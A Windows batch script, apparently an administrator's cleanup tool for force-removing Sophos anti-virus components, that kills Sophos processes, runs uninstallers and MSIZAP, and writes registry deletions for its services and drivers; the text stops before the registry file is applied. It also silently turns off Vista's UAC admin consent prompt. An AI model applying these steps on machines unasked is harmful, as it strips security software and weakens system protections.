ECHO -- Small Business Edition
ECHO -- Enterprise Console
ECHO -- EM Library
ECHO -- PureMessage
Echo.
ECHO Script intended for use on Windows 2000/XP/2003/Vista ONLY.
ECHO.
ECHO Press Ctrl-C to Cancel.
ECHO ==================================================================
ECHO.
Pause
CLS
ECHO Checking for 64-bit operating system...
if exist "%windir%\syswow64" (
Echo.
Echo ==========================================================
Echo We have detected that you are using this script
Echo on a 64-bit Operating System. For this script to
Echo run properly on this version of Windows, this
Echo script should be run in a 32-bit command prompt
Echo window. This can be done by running
Echo %windir%\syswow64\cmd.exe and then running the script again
Echo from that command prompt window.
Echo.
Echo Please exit this script if it is not being run in this
Echo manner by pressing CTRL+C.
Echo ==========================================================
Echo.
pause
)
ECHO Checking Requirements...
if exist "%PROGRAMFILES%\Sophos\Sophos Anti-Rootkit" (
Echo.
Echo Sophos Anti-Rootkit found, aborting script.
Echo.
pause
Exit
)
ECHO Checking Requirements...
if exist "%PROGRAMFILES%\Sophos\Sophos Diagnostic Utility" (
Echo.
Echo Sophos Diagnostic Utility found, aborting script.
Echo.
pause
Exit
)
ECHO Checking Requirements...
if exist "%PROGRAMFILES%\Sophos\NAC" (
Echo.
Echo Sophos NAC found, aborting script.
Echo.
pause
Exit
)
if exist "%PROGRAMFILES%\Sophos\Enterprise Console" (
Echo.
Echo Sophos Enterprise Console found, aborting script.
Echo.
pause
Exit
)
if exist "%PROGRAMFILES%\Sophos\PureMessage" (
Echo.
Echo Sophos PureMessage found, aborting script.
Echo.
pause
Exit
)
if exist "%PROGRAMFILES%\Sophos Enterprise Manager" (
Echo.
Echo Sophos EM Library found, aborting script.
Echo.
pause
Exit
)
if exist "%PROGRAMFILES%\Sophos\SCC" (
Echo.
Echo Sophos SBE found, aborting script.
Echo.
pause
Exit
)
if exist "%PROGRAMFILES%\Sophos\Sophos Client Firewall" (
Echo.
Echo Sophos Client Firewall found, aborting script.
Echo.
pause
Exit
)
ECHO Completed.
ECHO.
ECHO Checking for Microsoft Vista (1)...
ver|find "Version 6.0" >NUL
if %errorlevel% equ 0 (
Echo.
Echo Found: Changing UAC mode to silent...
ECHO REGEDIT4 > %temp%\sopuac.reg
ECHO. >> %temp%\sopuac.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] >> %temp%\sopuac.reg
ECHO "ConsentPromptBehaviorAdmin"=dword:00000000 >> %temp%\sopuac.reg
regedit /S %temp%\sopuac.reg >NUL 2>NUL
ECHO Completed.
) ELSE (Echo Microsoft Vista not found.)
ECHO.
ECHO Killing Active Sophos Processes...
TASKKILL /F /IM "Almon.exe" >NUL 2>NUL
TASKKILL /F /IM "ICMON.exe" >NUL 2>NUL
Echo Completed.
ECHO.
ECHO Performing Regular Uninstall...
REM MSIEXEC /X {15C418EB-7675-42be-B2B3-281952DA014D} /qn 2>NUL
REM MSIEXEC /X {C12953C2-4F15-4A6C-91BC-511B96AE2775} /qn 2>NUL
REM MSIEXEC /X {09C6BF52-6DBA-4A97-9939-B6C24E4738BF} REBOOT=SUPPRESS /qn 2>NUL
REM MSIEXEC /X {034759DA-E21A-4795-BFB3-C66D17FAD183} REBOOT=SUPPRESS /qn 2>NUL
REM MSIEXEC /X {FF11005D-CBC8-45D5-A288-25C7BB304121} /qn 2>NUL
"%PROGRAMFILES%\Sophos Sweep for NT\Setup.exe" -ni -force -remove 2>NUL
ECHO Completed.
ECHO.
ECHO Performing MSI Cleanup On Sophos Components...
"%PROGRAMFILES%\Windows Installer Clean Up\MSIZAP.EXE" tw {15C418EB-7675-42be-B2B3-281952DA014D} >NUL 2>NUL
"%PROGRAMFILES%\Windows Installer Clean Up\MSIZAP.EXE" tw {09C6BF52-6DBA-4A97-9939-B6C24E4738BF} >NUL 2>NUL
"%PROGRAMFILES%\Windows Installer Clean Up\MSIZAP.EXE" tw {C12953C2-4F15-4A6C-91BC-511B96AE2775} >NUL 2>NUL
"%PROGRAMFILES%\Windows Installer Clean Up\MSIZAP.EXE" tw {FF11005D-CBC8-45D5-A288-25C7BB304121} >NUL 2>NUL
"%PROGRAMFILES%\Windows Installer Clean Up\MSIZAP.EXE" tw {034759DA-E21A-4795-BFB3-C66D17FAD183} >NUL 2>NUL
Echo Completed.
ECHO.
ECHO Constructing Registry Keys For Removal...
ECHO Completed.
ECHO REGEDIT4 > %TEMP%\SOTMP.REG
ECHO. >> %TEMP%\SOTMP.REG
REM ====** Registry Keys marked for Removal **=====================================================================
REM === MSI Installer GUIDs ===
ECHO [-HKEY_CLASSES_ROOT\Installer\Products\25FB6C90ABD679A499936B2CE47483FB] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\Products\BE814C515767eb242B3B829125AD10D4] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\Products\2C35921C51F4C6A419CB15B169EA7257] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\Products\D50011FF8CBC5D542A88527CBB031412] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\Products\AD957430A12E5974FB3B6CD671AF1D38] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\Features\25FB6C90ABD679A499936B2CE47483FB] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\Features\BE814C515767eb242B3B829125AD10D4] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\Features\2C35921C51F4C6A419CB15B169EA7257] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\Features\D50011FF8CBC5D542A88527CBB031412] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\Features\AD957430A12E5974FB3B6CD671AF1D38] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\UpgradeCodes\E932B7952303A1943A2218777329E5A8] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\UpgradeCodes\0D6888B32A8929940ACA98A3DEBB94B4] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\UpgradeCodes\A2ECF5789F971654CBB5476964870E94] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Features\25FB6C90ABD679A499936B2CE47483FB] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Features\BE814C515767eb242B3B829125AD10D4] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Features\2C35921C51F4C6A419CB15B169EA7257] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Features\D50011FF8CBC5D542A88527CBB031412] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Features\AD957430A12E5974FB3B6CD671AF1D38] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\25FB6C90ABD679A499936B2CE47483FB] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\BE814C515767eb242B3B829125AD10D4] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\2C35921C51F4C6A419CB15B169EA7257] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\D50011FF8CBC5D542A88527CBB031412] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\AD957430A12E5974FB3B6CD671AF1D38] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E932B7952303A1943A2218777329E5A8] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\0D6888B32A8929940ACA98A3DEBB94B4] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A2ECF5789F971654CBB5476964870E94] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\E932B7952303A1943A2218777329E5A8] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\0D6888B32A8929940ACA98A3DEBB94B4] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\A2ECF5789F971654CBB5476964870E94] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\25FB6C90ABD679A499936B2CE47483FB] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\BE814C515767eb242B3B829125AD10D4] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2C35921C51F4C6A419CB15B169EA7257] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D50011FF8CBC5D542A88527CBB031412] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\AD957430A12E5974FB3B6CD671AF1D38] >> %TEMP%\SOTMP.REG
REM === Sophos Application Settings ===
ECHO [-HKEY_CURRENT_USER\Software\Sophos] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\Software\Sophos] >> %TEMP%\SOTMP.REG
REM === Sophos Uninstall Keys ===
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{09C6BF52-6DBA-4A97-9939-B6C24E4738BF}] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{15C418EB-7675-42be-B2B3-281952DA014D}] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C12953C2-4F15-4A6C-91BC-511B96AE2775}] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{FF11005D-CBC8-45D5-A288-25C7BB304121}] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{034759DA-E21A-4795-BFB3-C66D17FAD183}] >> %TEMP%\SOTMP.REG
REM === Sophos Legacy Services Set01 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAVONACCESS] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAVADMINSERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAVONACCESS_CONTROL] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAVONACCESS_FILTER] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAVSERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SOPHOS_AGENT] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SOPHOS_AUTOUPDATE_AGENT] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SOPHOS_AUTOUPDATE_SERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SOPHOS_MESSAGE_ROUTER] >> %TEMP%\SOTMP.REG
REM === Sophos Event Log Registration Set01 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\Application\Sophos Message Router] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\Application\SophosAntiVirus] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\Application\Sophos Anti-Virus] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\SAVOnAccessControl] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\SAVOnAccessFilter] >> %TEMP%\SOTMP.REG
REM === Sophos Services Set01 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SAVAdminService] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SAVOnAccess] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SAVOnAccessControl] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SAVOnAccessFilter] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SAVService] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Sophos Agent] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Sophos AutoUpdate Agent] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Sophos AutoUpdate Service] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Sophos Message Router] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SophosBootDriver] >> %TEMP%\SOTMP.REG
REM === Sophos Legacy Services Set02 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SAVONACCESS] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SAVADMINSERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SAVONACCESS_CONTROL] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SAVONACCESS_FILTER] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SAVSERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SOPHOS_AGENT] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SOPHOS_AUTOUPDATE_AGENT] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SOPHOS_AUTOUPDATE_SERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SOPHOS_MESSAGE_ROUTER] >> %TEMP%\SOTMP.REG
REM === Sophos Event Log Registration Set02 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\Application\Sophos Message Router] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\Application\SophosAntiVirus] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\Application\Sophos Anti-Virus] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\SAVOnAccessControl] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\SAVOnAccessFilter] >> %TEMP%\SOTMP.REG
REM === Sophos Services Set02 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SAVAdminService] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SAVOnAccess] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SAVOnAccessControl] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SAVOnAccessFilter] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SAVService] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Sophos Agent] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Sophos AutoUpdate Agent] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Sophos AutoUpdate Service] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Sophos Message Router] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SophosBootDriver] >> %TEMP%\SOTMP.REG
REM === Sophos Legacy Services Set03 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SAVONACCESS] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SAVADMINSERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SAVONACCESS_CONTROL] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SAVONACCESS_FILTER] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SAVSERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SOPHOS_AGENT] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SOPHOS_AUTOUPDATE_AGENT] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SOPHOS_AUTOUPDATE_SERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SOPHOS_MESSAGE_ROUTER] >> %TEMP%\SOTMP.REG
REM === Sophos Event Log Registration Set03 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Eventlog\Application\Sophos Message Router] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Eventlog\Application\SophosAntiVirus] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Eventlog\Application\Sophos Anti-Virus] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Eventlog\System\SAVOnAccessControl] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Eventlog\System\SAVOnAccessFilter] >> %TEMP%\SOTMP.REG
REM === Sophos Services Set03 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\SAVAdminService] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\SAVOnAccess] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\SAVOnAccessControl] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\SAVOnAccessFilter] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\SAVService] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Sophos Agent] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Sophos AutoUpdate Agent] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Sophos AutoUpdate Service] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Sophos Message Router] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\SophosBootDriver] >> %TEMP%\SOTMP.REG
REM === Sophos Legacy Services Current===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAVONACCESS] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAVADMINSERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAVONACCESS_CONTROL] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAVONACCESS_FILTER] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SOPHOS_AGENT] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAVSERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SOPHOS_AUTOUPDATE_AGENT] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SOPHOS_AUTOUPDATE_SERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SOPHOS_MESSAGE_ROUTER] >> %TEMP%\SOTMP.REG
REM === Sophos Event Log Registration Current ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Application\Sophos Message Router] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Application\SophosAntiVirus] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Application\Sophos Anti-Virus] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\SAVOnAccessControl] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\SAVOnAccessFilter] >> %TEMP%\SOTMP.REG
REM === Sophos Services Current ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SAVAdminService] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlControlSet\Services\SAVOnAccess] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SAVOnAccessControl] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SAVOnAccessFilter] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SAVService] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Agent] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos AutoUpdate Agent] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos AutoUpdate Service] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Message Router] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\SophosBootDriver] >> %TEMP%\SOTMP.REG
REM === Sophos 4.x Removal ===
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %TEMP%\SOTMP.REG
echo "Sweep95"=%nulvar% >> %TEMP%\SOTMP.REG
echo "InterCheckMonitor"=%nulvar% >> %TEMP%\SOTMP.REG
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices] >> %TEMP%\SOTMP.REG
echo "Sweep95"=%nulvar% >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VxD\Sophos ICSTATIC] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Sophos-Sweep95] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sophos-SweepNT] >> %TEMP%\SOTMP.REG
echo [-HKEY_CURRENT_USER\Software\Sophos\SweepNT] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SweepNT] >> %TEMP%\SOTMP.REG
echo [-HKEY_USERS\.DEFAULT\Software\Sophos\SweepNT] >> %TEMP%\SOTMP.REG
REM === CurrentControlSet ===
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Application\SweepNT] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Control] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Filter] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 11] >> %TEMP%\SOTMP.REG
